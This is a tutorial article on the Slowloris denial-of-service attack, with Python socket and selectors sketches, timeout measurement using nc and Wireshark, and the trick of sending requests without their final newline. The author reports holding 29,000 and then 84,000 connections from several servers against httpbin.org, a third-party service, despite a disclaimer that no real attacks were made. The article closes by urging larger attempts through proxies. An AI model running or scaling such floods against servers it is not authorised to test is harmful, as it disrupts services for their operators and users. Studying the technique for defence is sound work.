
The Slowloris attack is a specific type of cyberattack that aims to disable web servers by establishing and maintaining numerous incomplete HTTP connections. This method allows a single attacking device to efficiently use a minimum of resources to achieve maximum impact without affecting other services and ports. Servers that do not have adequate mechanisms to protect against slow HTTP requests are vulnerable to this attack.
Disclaimer: No servers were harmed in the making of this article. The httpbin.org service was used for demonstration purposes only. No real attacks were carried out, and all requests were controlled and used only to verify the code’s operation. The material is for educational purposes only and is not intended to encourage malicious actions.
This article is intended to introduce the principles of the Slow Loris attack. It is worth noting that this method is quite outdated, and modern systems already have built-in mechanisms for protecting against it.
We previously investigated this behavior by experimenting with worker exhaustion in Nginx. Now we will take a closer look at how Slow Loris works and how it can be implemented using Python.
The Slow Loris attack is based on opening a large number of connections to a server and keeping them open for as long as possible. This is achieved by sending partial HTTP requests, which are periodically supplemented with new headers to prevent sockets from being closed.
When this attack was first implemented and tested in 2009, the speed of the Internet was much lower, and web servers did not have clear limits on the time it took to receive a complete request. Because of this, servers only closed the connection if they did not receive any data, such as headers, for a certain period of time. However, if the server received at least part of the header, it considered the connection active and continued to hold it.
Today, the situation has changed: the Internet has become much faster, and modern web servers already have a set timeout during which the client must send a complete request. This article will take these modern defense mechanisms into account, test the Slow Loris attack, and see how effective it can still be in today’s environment.
To successfully implement the Slow Loris attack, you first need to determine the server timeout — that is, the amount of time the server keeps the connection open while waiting for data. You can do this using Linux utilities such as netcat, as well as Wireshark for detailed traffic analysis.
The testbed in this case will be httpbin.org, which allows for safe testing and experimentation.
Let’s convert a domain name to an IP address using nslookup:
$ nslookup httpbin.org Server: 127.0.0.53 Address: 127.0.0.53#53 Non-authoritative answer: Name: httpbin.org Address: 3.230.67.98 Name: httpbin.org Address: 3.211.25.71
As you can see, the httpbin.org domain has two IP addresses. This is due to load balancing. For our experiment, we will focus on 3.230.67.98.
Open Wireshark and specify a filter for the desired IP address:
ip.addr eq 3.230.67.98
netcat
In the terminal, connect to the server without sending data:
$ nc 3.230.67.98 443
This will establish a TCP connection, but we will not transfer any data.
In Wireshark we will see the following:
Packet [1] is the ACK packet that completes the TCP handshake.
Packet [2] is the FIN ACK packet that completes the connection.
The time between packet [1] and packet [2] can be seen in the Time column. For example:
Packet [1]: 2.5 seconds
Packet [2]: 62.67 seconds
The difference between them is 60 seconds. So the server timeout is 60 seconds. Note: SSL Handshake does not reset the timeout.
Slow Loris is about a large number of connections. Let’s calculate the bandwidth of your Internet connection to have time to transfer data before the server closes the connection due to timeout.
For example, if you open 65,000 connections and each of them sends a minimal request GET / HTTP/1.1\r\nHost: httpbin.org\r\nConnection: keep-alive\r\n\r\n which is 61 bytes in size, then this is what we get:
65 000 × 61 байти = 3 965 000 байт ≈ 3.78 МБ
If the server has a timeout of 60 seconds, then the speed required to transfer all this data is:
3.78 МБ / 60 секунд ≈ 61 КБ/сек
Even a slow internet connection is enough to support such an attack. The main thing is to distribute the requests correctly and adhere to the timings to keep the connection as long as possible without timeouts. Don’t forget to specify the Connection: keep-alive header so that the server does not close the connection immediately after the response.
Open a TCP connection. This is the first step to establish a basic connection to the server.
We define the server timeout. In our example, the timeout is 60 seconds, but it is better to assume an error of 5 seconds, so we will set it to 55 seconds.
SSL Handshake. After a TCP connection is established, an SSL Handshake must be performed to ensure a secure connection.
Sending an incomplete HTTP request. For example, a standard request:
GET / HTTP/1.1\r\n Host: httpbin.org\r\n Connection: keep-alive\r\n \r <-- Зверніть увагу! Останній \n відсутній!
Connection hold. Before the timeout expires (at 54-55 seconds), we send the last byte \n to maintain the connection. After sending \n, the request will be considered complete and the timeout will be updated, so we send the incomplete HTTP request again and count down the time.
Opening additional connections in parallel. Sending an incomplete request takes a few milliseconds or seconds, so we have enough time to open hundreds or even thousands of new connections!
As you can see, the keep-alive strategy is significantly different from the original Slow Loris attack. In one Connection: keep-alive connection, you can send hundreds of requests!
At a rate of 1 request every 55 seconds and a number of 100 requests, this is a keep-alive of 90 minutes!
Of course, some connections may close, so we will open them again.
You can calculate the timeout for each connection separately. This will be easier to understand and implement. Another option is to group connections and calculate the timeout from the first socket. The advantage of this method is that it implies that the server will receive many requests at once, which will be processed at the same time.
If you want maximum load at one time, a group timeout is better.
For flexible control of each connection, use a separate timeout.
We won’t go into the details of how Event-Driven architecture works, but its use will allow you to establish a huge number of connections. This approach is much more efficient than using individual threads – imagine that creating 65 thousand threads looks like a real nightmare.
To implement this, an event loop will be constructed that will monitor activity in sockets, in particular, when they are ready for read or write operations. Operating systems provide special system calls for this, among which select() or epoll() in Linux, kevent() in some versions of FreeBSD and macOS, as well as WaitForMultipleObjects() in Windows.
Python provides a built-in selectors library that provides high-level and efficient I/O multiplexing. By default, it chooses the optimal solution for a particular operating system (via DefaultSelector()), and this mechanism will be used to manage connections.
The basic plan is as follows:
We create a non-blocking socket:
import socket ADDRESS = ("3.230.67.98", 443) def connect(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setblocking(False) # !!! MUST HAVE s.connect_ex(ADDRESS) # Використовуємо connect_ex, щоб уникнути виключення return s
We create a selector that monitors sockets. The .register() method can take any data as its third argument. We will use it to store a callback, a function that will be called when the socket is ready.
import selectors sel = selectors.DefaultSelector() def on_connected(sock): print("Socket connected!!") sock = connect() sel.register(sock, selectors.EVENT_WRITE, on_connected)
SSL handshake:
import ssl
ctx = ssl.create_default_ctx()
req = b'GET / HTTP/1.1\r\nConnection: keep-alive\r\n\r' # <-- no \n at the end
def delay(time, sock):
# Implement delay logic
sock.send(b'\n')
def on_ssl_handske_completed(sock):
# Handshake completed
sock.send(req)
delay(55, sock)
def on_connected(sock):
sock = ctx.wrap_socket(sock, ...)
try:
sock.do_handshake()
except ssl.SSLWantReadError:
... # Handle this with selectors
except ssl.SSLWantWriteError:
... # and this
while True:
events = sel.select()
for selector_key, event in events:
callback = selector_key.data
callback(selector_key.fileobj)
This is just a general code example and demonstration of the Event-Driven architecture that underpins asynchrony. You can find the full code in the “Useful Links” section to avoid cluttering the article.
However, try implementing this yourself – it will be a great project to understand the basics of asynchrony.
Let’s run a program that creates and maintains a large number of connections. The first thing I want to note is that after opening about 29 thousand connections, we started getting an error:
OSError [errno 99] cannot assign requested address
So let’s limit ourselves to this number. Every 55 seconds the program will send a request and output something like this to the terminal:
Synced 25562 sockets
Where 25562 is the number of active sockets. Of course, after each request some connections may have been closed.
To further check the number of active connections, you can use the following command:
netstat | grep 3.230.67.98 | grep ESTABLISHED | wc -l
The response will be a number close to the number of active connections in the program. The error is only possible due to the time difference between sending the request and checking.
Despite the number of connections achieved, this was still not enough to disable the httpbin.org server, which indicates the high-quality configuration of the latter. However, there is no retreat!
To continue the experiment, it was proposed to conduct a second attack using virtual servers, each of which has its own unique IP address. This solution will significantly increase the number of simultaneous connections and, accordingly, increase the effectiveness of the chosen strategy.
So, the next step is to scale the attack!
To strengthen the attack, three servers were used, each of which created and supported 28 thousand connections. In total, this made it possible to establish 84,000 simultaneous connections to the httpbin.org server. However, even under such conditions, the server remained stable and did not fail.
This does not mean that the attack itself is ineffective. In fact, it indicates excellent server configuration. Properly configured timeouts, limiting the number of connections from one client, and other defense mechanisms prevented a successful attack.
Here is an example of what the result on check-host.com would look like for a server that is vulnerable to attack:
The Broken pipe error indicates that the server, specifically nginx, does not have enough resources to handle a large number of connections, which is why the connection cannot be established or processed.
Above, when we talked about the connection hold strategy, the batch timeout tactic was suggested, which leads to a large number of requests arriving simultaneously. In such a situation, you can get a Server Error. This is more likely a consequence of high load on the backend than a Slow Loris attack.
httpbin.org demonstrates an example of a good server configuration that is not vulnerable to the number of connections that we tested. However, this does not stop us from carrying out larger tests – perhaps next time everything will work out! At the same time, there are servers that are vulnerable even to 6 thousand connections and cannot withstand the load.
The article analyzes the principle of the Slow Loris attack with some modifications to the technique, since the classic approach no longer has the vulnerability that it used to have. However, the vulnerability itself remains in modern conditions, provided that the right strategies are used and the attack is scaled up. Therefore, the answer to the question of whether this method can be considered a vulnerability today is positive: it is still possible to attack modern systems with this method. To achieve success, it is necessary to conduct numerous experiments and look for alternative approaches, in particular, the use of proxy servers, which allows you to adapt the technique to modern conditions and increase the effectiveness of the attack.